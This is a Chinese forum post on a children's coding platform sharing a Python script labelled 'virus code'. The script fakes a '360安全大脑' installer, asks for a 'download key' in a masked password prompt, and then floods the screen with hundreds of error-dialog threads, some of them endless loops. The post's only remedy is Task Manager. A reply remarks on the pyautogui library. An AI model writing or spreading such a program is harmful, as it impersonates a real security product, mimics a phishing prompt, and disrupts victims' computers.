猫史档案馆


【Python作品分享】病毒代码 【作品秀】

用户:oWuGi7s6oWuGi7s6查看:13 回复:1 评论:13 创建时间:2022-11-27T09:49:13


【作品展示】

center_image

 

【作品介绍】

解决方法:一直按回车,最后用任务管理器

 

【作品源代码】

import pyautogui
import threading


pyautogui.alert(text="欢迎进入360安全大脑下载系统", title="安装向导", button="OK")
result = pyautogui.confirm(text='请选择下载方式', title='安装向导', buttons=['本地下载', '应用管家下载'])

content = pyautogui.password(text=('请输入下载密钥'), title='', default='', mask='*')

def t():

    pyautogui.alert(text="操作失败(738)\n操作失败(6509)\n操作失败(u7y8)\n操作失败(i0kt56)\n操作失败(br6384)\n操作失败(未知错误)\n操作失败(u758o)\n操作失败(j8y62)", title="操作失败", button="OK")

def t1():

    pyautogui.alert(text="下载失败(nss776)  下载失败(nss065)",title="操作失败", button="OK")

def t2():

    pyautogui.alert(text="下载错误", title="下载错误", button="OK")

threads = []

def t3():

    while True:
        pyautogui.alert(text="下载错误", title="下载错误", button="OK")

def t4():

    while True:
        pyautogui.alert(text="                                 下载错误                               ", title="错误", button="OK")

for __count in range(120):
    threads.append(threading.Thread(target=t))
    threads.append(threading.Thread(target=t1))
    threads.append(threading.Thread(target=t2))

threads.append(threading.Thread(target=t3))
threads.append(threading.Thread(target=t4))
threads.append(threading.Thread(target=t3))
threads.append(threading.Thread(target=t4))

if (__name__ == '__main__'):
    for t in threads:
        t.start()

 

【提示】

部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:

https://python.codemao.cn


回复

上一页1 页 / 共 1下一页
林夕狐林夕狐

编程猫居然能用这个库!

pyautogui

点赞2


评论